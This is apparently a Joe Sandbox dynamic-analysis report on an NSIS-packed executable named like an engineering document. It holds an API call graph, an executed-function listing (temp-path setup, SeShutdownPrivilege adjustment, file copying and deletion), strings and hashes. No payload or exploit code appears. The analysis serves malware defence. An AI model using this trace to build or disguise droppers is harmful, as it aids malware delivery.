4430 100027e8 4363->4430 4370 1000178c 4365->4370 4371 100017a4 4367->4371 4374 100023da 11 API calls 4370->4374 4375 100017f9 4371->4375 4471 100023a0 4371->4471 4373 10001739 4373->4353 4374->4371 4375->4346 4379 10001803 GlobalFree 4375->4379 4379->4346 4381 100017e5 4381->4375 4475 100014e2 wsprintfA 4381->4475 4382 100017de FreeLibrary 4382->4381 4385 404f16 25 API calls 4384->4385 4386 401431 4385->4386 4386->4339 4478 10001215 GlobalAlloc 4387->4478 4389 10001a81 4479 10001215 GlobalAlloc 4389->4479 4391 10001cbb GlobalFree GlobalFree GlobalFree 4393 10001cd8 4391->4393 4412 10001d22 4391->4412 4392 10001a8c 4392->4391 4396 10001b60 GlobalAlloc 4392->4396 4400 10001bab lstrcpyA 4392->4400 4401 10001bc9 GlobalFree 4392->4401 4403 10001bb5 lstrcpyA 4392->4403 4406 10001f7a 4392->4406 4392->4412 4413 10001c07 4392->4413 4414 10001e75 GlobalFree 4392->4414 4417 10001224 2 API calls 4392->4417 4485 10001215 GlobalAlloc 4392->4485 4394 1000201a 4393->4394 4395 10001ced 4393->4395 4393->4412 4397 1000203c GetModuleHandleA 4394->4397 4394->4412 4395->4412 4482 10001224 4395->4482 4396->4392 4398 10002062 4397->4398 4399 1000204d LoadLibraryA 4397->4399 4486 100015a4 GetProcAddress 4398->4486 4399->4398 4399->4412 4400->4403 4401->4392 4403->4392 4404 10002074 4405 100020b3 4404->4405 4418 1000209d GetProcAddress 4404->4418 4407 100020c0 lstrlenA 4405->4407 4405->4412 4411 10001fbe lstrcpyA 4406->4411 4406->4412 4487 100015a4 GetProcAddress 4407->4487 4411->4412 4412->4345 4413->4392 4480 10001534 GlobalSize GlobalAlloc 4413->4480 4414->4392 4415 100020d9 4415->4412 4417->4392 4418->4405 4421 10002212 4419->4421 4420 10001224 GlobalAlloc lstrcpynA 4420->4421 4421->4420 4423 10002349 GlobalFree 4421->4423 4424 100022b9 GlobalAlloc MultiByteToWideChar 4421->4424 4425 1000230a lstrlenA 4421->4425 4489 100012ad 4421->4489 4423->4421 4426 10001712 4423->4426 4427 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4424->4427 4429 10002303 4424->4429 4425->4423 4425->4429 4426->4353 4426->4354 4426->4360 4427->4423 4429->4423 4493 1000251d 4429->4493 4432 100027fa 4430->4432 4431 1000289f CreateFileA 4433 100028bd 4431->4433 4432->4431 4434 100029b9 4433->4434 4435 100029ae GetLastError 4433->4435 4434->4353 4435->4434 4437 100021c0 4436->4437 4439 1000170b 4436->4439 4438 100021d2 GlobalAlloc 4437->4438 4437->4439 4438->4437 4439->4348 4443 100025a5 4440->4443 4441 100025f6 GlobalAlloc 4445 10002618 4441->4445 4442 10002609 4444 1000260e GlobalSize 4442->4444 4442->4445 4443->4441 4443->4442 4444->4445 4445->4373 4447 10002aae 4446->4447 4448 10002aee GlobalFree 4447->4448 4496 10001215 GlobalAlloc 4449->4496 4451 100023e6 4452 1000243a lstrcpynA 4451->4452 4453 1000244b StringFromGUID2 WideCharToMultiByte 4451->4453 4454 1000246f WideCharToMultiByte 4451->4454 4455 10002490 wsprintfA 4451->4455 4456 100024b4 GlobalFree 4451->4456 4457 100024ee GlobalFree 4451->4457 4458 10001266 2 API calls 4451->4458 4497 100012d1 4451->4497 4452->4451 4453->4451 4454->4451 4455->4451 4456->4451 4457->4361 4458->4451 4501 10001215 GlobalAlloc 4460->4501 4462 1000155f 4463 1000156c lstrcpyA 4462->4463 4465 10001586 4462->4465 4466 100015a0 4463->4466 4465->4466 4467 1000158b wsprintfA 4465->4467 4468 10001266 4466->4468 4467->4466 4469 100012a8 GlobalFree 4468->4469 4470 1000126f GlobalAlloc lstrcpynA 4468->4470 4469->4371 4470->4469 4472 100023ae 4471->4472 4474 100017c5 4471->4474 4473 100023c7 GlobalFree 4472->4473 4472->4474 4473->4472 4474->4381 4474->4382 4476 10001266 2 API calls 4475->4476 4477 10001503 4476->4477 4477->4375 4478->4389 4479->4392 4481 10001552 4480->4481 4481->4413 4488 10001215 GlobalAlloc 4482->4488 4484 10001233 lstrcpynA 4484->4412 4485->4392 4486->4404 4487->4415 4488->4484 4490 100012b4 4489->4490 4491 10001224 2 API calls 4490->4491 4492 100012cf 4491->4492 4492->4421 4494 10002581 4493->4494 4495 1000252b VirtualAlloc 4493->4495 4494->4429 4495->4494 4496->4451 4498 100012f9 4497->4498 4499 100012da 4497->4499 4498->4451 4499->4498 4500 100012e0 lstrcpyA 4499->4500 4500->4498 4501->4462 5367 401490 5368 404f16 25 API calls 5367->5368 5369 401497 5368->5369 5377 404893 GetDlgItem GetDlgItem 5378 4048e5 7 API calls 5377->5378 5385 404afd 5377->5385 5379 404988 DeleteObject 5378->5379 5380 40497b SendMessageA 5378->5380 5381 404991 5379->5381 5380->5379 5383 4049c8 5381->5383 5384 405d1f 18 API calls 5381->5384 5382 404be1 5387 404c8d 5382->5387 5398 404c3a SendMessageA 5382->5398 5420 404af0 5382->5420 5386 403ee2 19 API calls 5383->5386 5389 4049aa SendMessageA SendMessageA 5384->5389 5385->5382 5388 404b6e 5385->5388 5396 4047e1 5 API calls 5385->5396 5392 4049dc 5386->5392 5390 404c97 SendMessageA 5387->5390 5391 404c9f 5387->5391 5388->5382 5394 404bd3 SendMessageA 5388->5394 5389->5381 5390->5391 5395 404cc8 5391->5395 5400 404cb1 ImageList_Destroy 5391->5400 5401 404cb8 5391->5401 5397 403ee2 19 API calls 5392->5397 5393 403f49 8 API calls 5399 404e83 5393->5399 5394->5382 5403 404e37 5395->5403 5419 404861 4 API calls 5395->5419 5424 404d03 5395->5424 5396->5388 5402 4049ea 5397->5402 5404 404c4f SendMessageA 5398->5404 5398->5420 5400->5401 5401->5395 5405 404cc1 GlobalFree 5401->5405 5406 404abe GetWindowLongA SetWindowLongA 5402->5406 5413 404ab8 5402->5413 5416 404a39 SendMessageA 5402->5416 5417 404a75 SendMessageA 5402->5417 5418 404a86 SendMessageA 5402->5418 5407 404e49 ShowWindow GetDlgItem ShowWindow 5403->5407 5403->5420 5409 404c62 5404->5409 5405->5395 5408 404ad7 5406->5408 5407->5420 5410 404af5 5408->5410 5411 404add ShowWindow 5408->5411 5412 404c73 SendMessageA 5409->5412 5429 403f17 SendMessageA 5410->5429 5428 403f17 SendMessageA 5411->5428 5412->5387 5413->5406 5413->5408 5416->5402 5417->5402 5418->5402 5419->5424 5420->5393 5421 404e0d InvalidateRect 5421->5403 5422 404e23 5421->5422 5430 40479c 5422->5430 5423 404d31 SendMessageA 5427 404d47 5423->5427 5424->5423 5424->5427 5426 404dbb SendMessageA SendMessageA 5426->5427 5427->5421 5427->5426 5428->5420 5429->5385 5433 4046d7 5430->5433 5432 4047b1 5432->5403 5434 4046ed 5433->5434 5435 405d1f 18 API calls 5434->5435 5436 404751 5435->5436 5437 405d1f 18 API calls 5436->5437 5438 40475c 5437->5438 5439 405d1f 18 API calls 5438->5439 5440 404772 lstrlenA wsprintfA SetDlgItemTextA 5439->5440 5440->5432 4643 401595 4644 402a3a 18 API calls 4643->4644 4645 40159c SetFileAttributesA 4644->4645 4646 4015ae 4645->4646 5441 402616 5442 40261d 5441->5442 5448 40287c 5441->5448 5443 402a1d 18 API calls 5442->5443 5444 402628 5443->5444 5445 40262f SetFilePointer 5444->5445 5446 40263f 5445->5446 5445->5448 5449 405c5b wsprintfA 5446->5449 5449->5448 5450 401717 5451 402a3a 18 API calls 5450->5451 5452 40171e SearchPathA 5451->5452 5453 401739 5452->5453 5454 10001058 5456 10001074 5454->5456 5455 100010dc 5456->5455 5457 100014bb GlobalFree 5456->5457 5458 10001091 5456->5458 5457->5458 5459 100014bb GlobalFree 5458->5459 5460 100010a1 5459->5460 5461 100010b1 5460->5461 5462 100010a8 GlobalSize 5460->5462 5463 100010b5 GlobalAlloc 5461->5463 5464 100010c6 5461->5464 5462->5461 5465 100014e2 3 API calls 5463->5465 5466 100010d1 GlobalFree 5464->5466 5465->5464 5466->5455 5467 402519 5468 40252e 5467->5468 5469 40251e 5467->5469 5471 402a3a 18 API calls 5468->5471 5470 402a1d 18 API calls 5469->5470 5473 402527 5470->5473 5472 402535 lstrlenA 5471->5472 5472->5473 5474 405a17 WriteFile 5473->5474 5475 402557 5473->5475 5474->5475 5476 40149d 5477 4014ab PostQuitMessage 5476->5477 5478 40226e 5476->5478 5477->5478 5479 404320 5480 40434c 5479->5480 5481 40435d 5479->5481 5540 4054d7 GetDlgItemTextA 5480->5540 5483 404369 GetDlgItem 5481->5483 5515 4043c8 5481->5515 5485 40437d 5483->5485 5484 404357 5486 405f68 5 API calls 5484->5486 5487 404391 SetWindowTextA 5485->5487 5490 405808 4 API calls 5485->5490 5486->5481 5491 403ee2 19 API calls 5487->5491 5488 404656 5494 403f49 8 API calls 5488->5494 5496 404387 5490->5496 5497 4043ad 5491->5497 5492 405d1f 18 API calls 5498 40443c SHBrowseForFolderA 5492->5498 5493 4044dc 5499 40585d 18 API calls 5493->5499 5495 40466a 5494->5495 5496->5487 5504 40576f 3 API calls 5496->5504 5500 403ee2 19 API calls 5497->5500 5501 404454 CoTaskMemFree 5498->5501 5502 4044ac 5498->5502 5503 4044e2 5499->5503 5505 4043bb 5500->5505 5506 40576f 3 API calls 5501->5506 5502->5488 5542 4054d7 GetDlgItemTextA 5502->5542 5543 405cfd lstrcpynA 5503->5543 5504->5487 5541 403f17 SendMessageA 5505->5541 5508 404461 5506->5508 5511 404498 SetDlgItemTextA 5508->5511 5516 405d1f 18 API calls 5508->5516 5510 4043c1 5513 406092 5 API calls 5510->5513 5511->5502 5512 4044f9 5514 406092 5 API calls 5512->5514 5513->5515 5522 404500 5514->5522 5515->5488 5515->5492 5515->5502 5517 404480 lstrcmpiA 5516->5517 5517->5511 5520 404491 lstrcatA 5517->5520 5518 40453c 5544 405cfd lstrcpynA 5518->5544 5520->5511 5521 404543 5523 405808 4 API calls 5521->5523 5522->5518 5526 4057b6 2 API calls 5522->5526 5528 404594 5522->5528 5524 404549 GetDiskFreeSpaceA 5523->5524 5527 40456d MulDiv 5524->5527 5524->5528 5526->5522 5527->5528 5529 404605 5528->5529 5531 40479c 21 API calls 5528->5531 5530 404628 5529->5530 5532 40140b 2 API calls 5529->5532 5545 403f04 KiUserCallbackDispatcher 5530->5545 5533 4045f2 5531->5533 5532->5530 5535 404607 SetDlgItemTextA 5533->5535 5536 4045f7 5533->5536 5535->5529 5538 4046d7 21 API calls 5536->5538 5537 404644 5537->5488 5546 4042b5 5537->5546 5538->5529 5540->5484 5541->5510 5542->5493 5543->5512 5544->5521 5545->5537 5547 4042c3 5546->5547 5548 4042c8 SendMessageA 5546->5548 5547->5548 5548->5488 5549 100010e0 5558 1000110e 5549->5558 5550 100011c4 GlobalFree 5551 100012ad 2 API calls 5551->5558 5552 100011c3 5552->5550 5553 100011ea GlobalFree 5553->5558 5554 10001266 2 API calls 5557 100011b1 GlobalFree 5554->5557 5555 10001155 GlobalAlloc 5555->5558 5556 100012d1 lstrcpyA 5556->5558 5557->5558 5558->5550 5558->5551 5558->5552 5558->5553 5558->5554 5558->5555 5558->5556 5558->5557 5559 10002162 5560 100021c0 5559->5560 5561 100021f6 5559->5561 5560->5561 5562 100021d2 GlobalAlloc 5560->5562 5562->5560 5563 401b23 5564 401b30 5563->5564 5565 401b74 5563->5565 5568 401bb8 5564->5568 5573 401b47 5564->5573 5566 401b78 5565->5566 5567 401b9d GlobalAlloc 5565->5567 5577 40226e 5566->5577 5584 405cfd lstrcpynA 5566->5584 5569 405d1f 18 API calls 5567->5569 5570 405d1f 18 API calls 5568->5570 5568->5577 5569->5568 5572 402268 5570->5572 5578 4054f3 MessageBoxIndirectA 5572->5578 5582 405cfd lstrcpynA 5573->5582 5574 401b8a GlobalFree 5574->5577 5576 401b56 5583 405cfd lstrcpynA 5576->5583 5578->5577 5580 401b65 5585 405cfd lstrcpynA 5580->5585 5582->5576 5583->5580 5584->5574 5585->5577 5586 401ca7 5587 402a1d 18 API calls 5586->5587 5588 401cae 5587->5588 5589 402a1d 18 API calls 5588->5589 5590 401cb6 GetDlgItem 5589->5590 5591 402513 5590->5591 4071 40192a 4072 40192c 4071->4072 4073 402a3a 18 API calls 4072->4073 4074 401931 4073->4074 4077 40559f 4074->4077 4117 40585d 4077->4117 4080 4055c7 DeleteFileA 4082 40193a 4080->4082 4081 4055de 4087 40570c 4081->4087 4131 405cfd lstrcpynA 4081->4131 4084 405604 4085 405617 4084->4085 4086 40560a lstrcatA 4084->4086 4132 4057b6 lstrlenA 4085->4132 4088 40561d 4086->4088 4087->4082 4149 406001 FindFirstFileA 4087->4149 4091 40562b lstrcatA 4088->4091 4094 405636 lstrlenA FindFirstFileA 4088->4094 4091->4094 4093 405734 4152 40576f lstrlenA CharPrevA 4093->4152 4094->4087 4100 40565a 4094->4100 4097 40579a CharNextA 4097->4100 4098 405557 5 API calls 4099 405746 4098->4099 4101 405760 4099->4101 4102 40574a 4099->4102 4100->4097 4103 4056eb FindNextFileA 4100->4103 4114 4056ac 4100->4114 4136 405cfd lstrcpynA 4100->4136 4105 404f16 25 API calls 4101->4105 4102->4082 4107 404f16 25 API calls 4102->4107 4103->4100 4106 405703 FindClose 4103->4106 4105->4082 4106->4087 4108 405757 4107->4108 4109 405bb8 38 API calls 4108->4109 4112 40575e 4109->4112 4111 40559f 62 API calls 4111->4114 4112->4082 4113 404f16 25 API calls 4113->4103 4114->4103 4114->4111 4114->4113 4115 404f16 25 API calls 4114->4115 4137 405557 4114->4137 4145 405bb8 MoveFileExA 4114->4145 4115->4114 4155 405cfd lstrcpynA 4117->4155 4119 40586e 4156 405808 CharNextA CharNextA 4119->4156 4122 4055bf 4122->4080 4122->4081 4123 405f68 5 API calls 4129 405884 4123->4129 4124 4058af lstrlenA 4125 4058ba 4124->4125 4124->4129 4127 40576f 3 API calls 4125->4127 4126 406001 2 API calls 4126->4129 4128 4058bf GetFileAttributesA 4127->4128 4128->4122 4129->4122 4129->4124 4129->4126 4130 4057b6 2 API calls 4129->4130 4130->4124 4131->4084 4133 4057c3 4132->4133 4134 4057d4 4133->4134 4135 4057c8 CharPrevA 4133->4135 4134->4088 4135->4133 4135->4134 4136->4100 4162 40594b GetFileAttributesA 4137->4162 4140 405572 RemoveDirectoryA 4143 405580 4140->4143 4141 40557a DeleteFileA 4141->4143 4142 405584 4142->4114 4143->4142 4144 405590 SetFileAttributesA 4143->4144 4144->4142 4146 405bd9 4145->4146 4147 405bcc 4145->4147 4146->4114 4165 405a46 lstrcpyA 4147->4165 4150 405730 4149->4150 4151 406017 FindClose 4149->4151 4150->4082 4150->4093 4151->4150 4153 40573a 4152->4153 4154 405789 lstrcatA 4152->4154 4153->4098 4154->4153 4155->4119 4157 405823 4156->4157 4159 405833 4156->4159 4157->4159 4160 40582e CharNextA 4157->4160 4158 405853 4158->4122 4158->4123 4159->4158 4161 40579a CharNextA 4159->4161 4160->4158 4161->4159 4163 405563 4162->4163 4164 40595d SetFileAttributesA 4162->4164 4163->4140 4163->4141 4163->4142 4164->4163 4166 405a94 GetShortPathNameA 4165->4166 4167 405a6e 4165->4167 4168 405bb3 4166->4168 4169 405aa9 4166->4169 4192 405970 GetFileAttributesA CreateFileA 4167->4192 4168->4146 4169->4168 4171 405ab1 wsprintfA 4169->4171 4174 405d1f 18 API calls 4171->4174 4172 405a78 CloseHandle GetShortPathNameA 4172->4168 4173 405a8c 4172->4173 4173->4166 4173->4168 4175 405ad9 4174->4175 4193 405970 GetFileAttributesA CreateFileA 4175->4193 4177 405ae6 4177->4168 4178 405af5 GetFileSize GlobalAlloc 4177->4178 4179 405b17 4178->4179 4180 405bac CloseHandle 4178->4180 4181 4059e8 ReadFile 4179->4181 4180->4168 4182 405b1f 4181->4182 4182->4180 4194 4058d5 lstrlenA 4182->4194 4185 405b36 lstrcpyA 4188 405b58 4185->4188 4186 405b4a 4187 4058d5 4 API calls 4186->4187 4187->4188 4189 405b8f SetFilePointer 4188->4189 4190 405a17 WriteFile 4189->4190 4191 405ba5 GlobalFree 4190->4191 4191->4180 4192->4172 4193->4177 4195 405916 lstrlenA 4194->4195 4196 40591e 4195->4196 4197 4058ef lstrcmpiA 4195->4197 4196->4185 4196->4186 4197->4196 4198 40590d CharNextA 4197->4198 4198->4195 5599 4028aa SendMessageA 5600 4028c4 InvalidateRect 5599->5600 5601 4028cf 5599->5601 5600->5601 5602 40402b 5603 404041 5602->5603 5604 40414d 5602->5604 5607 403ee2 19 API calls 5603->5607 5605 4041bc 5604->5605 5606 404290 5604->5606 5612 404191 GetDlgItem SendMessageA 5604->5612 5605->5606 5608 4041c6 GetDlgItem 5605->5608 5613 403f49 8 API calls 5606->5613 5609 404097 5607->5609 5610 4041dc 5608->5610 5611 40424e 5608->5611 5614 403ee2 19 API calls 5609->5614 5610->5611 5618 404202 6 API calls 5610->5618 5611->5606 5619 404260 5611->5619 5633 403f04 KiUserCallbackDispatcher 5612->5633 5616 40428b 5613->5616 5617 4040a4 CheckDlgButton 5614->5617 5631 403f04 KiUserCallbackDispatcher 5617->5631 5618->5611 5622 404266 SendMessageA 5619->5622 5623 404277 5619->5623 5620 4041b7 5625 4042b5 SendMessageA 5620->5625 5622->5623 5623->5616 5624 40427d SendMessageA 5623->5624 5624->5616 5625->5605 5626 4040c2 GetDlgItem 5632 403f17 SendMessageA 5626->5632 5628 4040d8 SendMessageA 5629 4040f6 GetSysColor 5628->5629 5630 4040ff SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5628->5630 5629->5630 5630->5616 5631->5626 5632->5628 5633->5620 4547 4015b3 4548 402a3a 18 API calls 4547->4548 4549 4015ba 4548->4549 4550 405808 4 API calls 4549->4550 4562 4015c2 4550->4562 4551 40161c 4553 401621 4551->4553 4554 40164a 4551->4554 4552 40579a CharNextA 4552->4562 4555 401423 25 API calls 4553->4555 4556 401423 25 API calls 4554->4556 4557 401628 4555->4557 4563 401642 4556->4563 4574 405cfd lstrcpynA 4557->4574 4561 401633 SetCurrentDirectoryA 4561->4563 4562->4551 4562->4552 4564 401604 GetFileAttributesA 4562->4564 4566 405476 4562->4566 4569 4053dc CreateDirectoryA 4562->4569 4575 405459 CreateDirectoryA 4562->4575 4564->4562 4578 406092 GetModuleHandleA 4566->4578 4570 405429 4569->4570 4571 40542d GetLastError 4569->4571 4570->4562 4571->4570 4572 40543c SetFileSecurityA 4571->4572 4572->4570 4573 405452 GetLastError 4572->4573 4573->4570 4574->4561 4576 405469 4575->4576 4577 40546d GetLastError 4575->4577 4576->4562 4577->4576 4579 4060b8 GetProcAddress 4578->4579 4580 4060ae 4578->4580 4582 40547d 4579->4582 4584 406028 GetSystemDirectoryA 4580->4584 4582->4562 4583 4060b4 4583->4579 4583->4582 4585 40604a wsprintfA LoadLibraryA 4584->4585 4585->4583 5634 4016b3 5635 402a3a 18 API calls 5634->5635 5636 4016b9 GetFullPathNameA 5635->5636 5637 4016d0 5636->5637 5638 4016f1 5636->5638 5637->5638 5641 406001 2 API calls 5637->5641 5639 401705 GetShortPathNameA 5638->5639 5640 4028cf 5638->5640 5639->5640 5642 4016e1 5641->5642 5642->5638 5644 405cfd lstrcpynA 5642->5644 5644->5638 5645 406a37 5648 4061c8 5645->5648 5646 406252 GlobalAlloc 5646->5648 5649 406b33 5646->5649 5647 406249 GlobalFree 5647->5646 5648->5646 5648->5647 5648->5648 5648->5649 5650 4062c0 GlobalFree 5648->5650 5651 4062c9 GlobalAlloc 5648->5651 5650->5651 5651->5648 5651->5649 5652 4014b7 5653 4014bd 5652->5653 5654 401389 2 API calls 5653->5654 5655 4014c5 5654->5655 5656 401d38 GetDC GetDeviceCaps 5657 402a1d 18 API calls 5656->5657 5658 401d56 MulDiv ReleaseDC 5657->5658 5659 402a1d 18 API calls 5658->5659 5660 401d75 5659->5660 5661 405d1f 18 API calls 5660->5661 5662 401dae CreateFontIndirectA 5661->5662 5663 402513 5662->5663 5664 40363b 5665 403646 5664->5665 5666 40364a 5665->5666 5667 40364d GlobalAlloc 5665->5667 5667->5666 4894 40173e 4895 402a3a 18 API calls 4894->4895 4896 401745 4895->4896 4897 40599f 2 API calls 4896->4897 4898 40174c 4897->4898 4899 40599f 2 API calls 4898->4899 4899->4898 5668 401ebe 5669 402a3a 18 API calls 5668->5669 5670 401ec5 5669->5670 5671 406001 2 API calls 5670->5671 5672 401ecb 5671->5672 5673 401edd 5672->5673 5675 405c5b wsprintfA 5672->5675 5675->5673 5676 40193f 5677 402a3a 18 API calls 5676->5677 5678 401946 lstrlenA 5677->5678 5679 402513 5678->5679

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 004030D9 Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 355comstringfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 4030d9-40310e SetErrorMode GetVersion 1 403110-403118 call 406092 0->1 2 403121-4031b2 call 406028 * 3 call 406092 * 2 #17 OleInitialize SHGetFileInfoA call 405cfd GetCommandLineA call 405cfd GetModuleHandleA 0->2 1->2 7 40311a 1->7 20 4031b4-4031b9 2->20 21 4031be-4031d3 call 40579a CharNextA 2->21 7->2 20->21 24 403298-40329c 21->24 25 4032a2 24->25 26 4031d8-4031db 24->26 29 4032b5-4032cf GetTempPathA call 4030a8 25->29 27 4031e3-4031eb 26->27 28 4031dd-4031e1 26->28 30 4031f3-4031f6 27->30 31 4031ed-4031ee 27->31 28->27 28->28 39 4032d1-4032ef GetWindowsDirectoryA lstrcatA call 4030a8 29->39 40 403327-403341 DeleteFileA call 402c66 29->40 33 403288-403295 call 40579a 30->33 34 4031fc-403200 30->34 31->30 33->24 52 403297 33->52 37 403202-403208 34->37 38 403218-403245 34->38 43 40320a-40320c 37->43 44 40320e 37->44 45 403247-40324d 38->45 46 403258-403286 38->46 39->40 54 4032f1-403321 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030a8 39->54 55 4033d5-4033e5 call 4035a3 OleUninitialize 40->55 56 403347-40334d 40->56 43->38 43->44 44->38 48 403253 45->48 49 40324f-403251 45->49 46->33 51 4032a4-4032b0 call 405cfd 46->51 48->46 49->46 49->48 51->29 52->24 54->40 54->55 68 403509-40350f 55->68 69 4033eb-4033fb call 4054f3 ExitProcess 55->69 59 4033c5-4033cc call 40367d 56->59 60 40334f-40335a call 40579a 56->60 66 4033d1 59->66 72 403390-40339a 60->72 73 40335c-403385 60->73 66->55 70 403511-40352a GetCurrentProcess OpenProcessToken 68->70 71 40358b-403593 68->71 75 40355c-40356a call 406092 70->75 76 40352c-403556 LookupPrivilegeValueA AdjustTokenPrivileges 70->76 78 403595 71->78 79 403599-40359d ExitProcess 71->79 80 403401-403415 call 405476 lstrcatA 72->80 81 40339c-4033a9 call 40585d 72->81 77 403387-403389 73->77 93 403578-403582 ExitWindowsEx 75->93 94 40356c-403576 75->94 76->75 77->72 86 40338b-40338e 77->86 78->79 91 403422-40343c lstrcatA lstrcmpiA 80->91 92 403417-40341d lstrcatA 80->92 81->55 90 4033ab-4033c1 call 405cfd * 2 81->90 86->72 86->77 90->59 91->55 96 40343e-403441 91->96 92->91 93->71 97 403584-403586 call 40140b 93->97 94->93 94->97 99 403443-403448 call 4053dc 96->99 100 40344a call 405459 96->100 97->71 108 40344f-40345c SetCurrentDirectoryA 99->108 100->108 109 403469-403491 call 405cfd 108->109 110 40345e-403464 call 405cfd 108->110 114 403497-4034b3 call 405d1f DeleteFileA 109->114 110->109 117 4034f4-4034fb 114->117 118 4034b5-4034c5 CopyFileA 114->118 117->114 120 4034fd-403504 call 405bb8 117->120 118->117 119 4034c7-4034e7 call 405bb8 call 405d1f call 40548e 118->119 119->117 129 4034e9-4034f0 CloseHandle 119->129 120->55 129->117
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004030FE
                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00403104
                                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403153
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040315A
                                                                                                                                                                                                                          • SHGetFileInfoA.SHELL32(0041ECE0,00000000,?,00000160,00000000), ref: 00403176
                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040318B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",00000000), ref: 0040319E
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",00000020), ref: 004031C9
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032C6
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D7
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E3
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F7
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FF
                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403310
                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403318
                                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040332C
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 004033DA
                                                                                                                                                                                                                            • Part of subcall function 004054F3: MessageBoxIndirectA.USER32(00409230), ref: 0040554E
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004033FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentFileHandleModulePathTempVariablelstrcat$AddressCharCommandDeleteDirectoryErrorExitIndirectInfoInitializeLineMessageModeNextProcProcessUninitializeVersionWindows
                                                                                                                                                                                                                          • String ID: "$"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe$C:\Users\user\falden\myotonias\nonvoting$C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu$A
                                                                                                                                                                                                                          • API String ID: 2526692829-2327213740
                                                                                                                                                                                                                          • Opcode ID: 5d32af4ea543c0817f9c1176b523a64e399aa3e0298921c02971181efbbc86ca
                                                                                                                                                                                                                          • Instruction ID: bda156f374487f2bbb29673c031f74f644c2b1eaea70be50b0a917a6d4bf9e43
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d32af4ea543c0817f9c1176b523a64e399aa3e0298921c02971181efbbc86ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C1E6706082427AE7116F719D4DA2B3EACEB8570AF04457FF542B51E2CB7C9A058B2E
                                                                                                                                                                                                                          Function 00405054 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

